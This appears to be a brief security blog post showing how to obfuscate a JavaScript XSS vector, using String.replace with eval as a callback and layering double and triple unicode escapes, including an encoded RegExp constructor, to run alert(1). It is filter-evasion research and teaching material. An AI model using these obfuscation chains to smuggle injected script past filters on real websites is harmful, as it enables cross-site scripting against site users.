I’ve known for a while that the replace function can call native functions in Firefox and IE. It works something like this:-



‘alert(1)’.replace(/.+/,eval)



So the regexp searches for the alert string and passes the result to the eval function which it receives as an argument. But does it stop there? Well no actually. There’s more. Then we can use unicode escapes to encode the string further like so:-

'\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029'.replace(/\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)

Remember javascript and regexp both accept unicode strings, this is interesting because we can double encode the vector like the above. The string contains javascript unicode escapes double encoded and the regular expression contains that string encoded. So that’s gotta be it right? C’mon it’s my blog, I wouldn’t just leave it there…

\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029')[-1].\u0072\u0065\u0070\u006c\u0061\u0063\u0065(\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0035\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0032\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0034\u005c\u0075\u0030\u0030\u0032\u0038\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0032\u0039'),\u0065\u0076\u0061\u006c)

The above uses RegExp and eval both of which are unicode escapes. Because the RegExp constructor is used we can pass a string that becomes decoded by javascript but we can then encode again as unicode regular expressions. [-1] signifies the text from the regular expression constructor we use this to replace.

Having trouble decoding? Well Hackvertor can help:-

http://tinyurl.com/hackvertor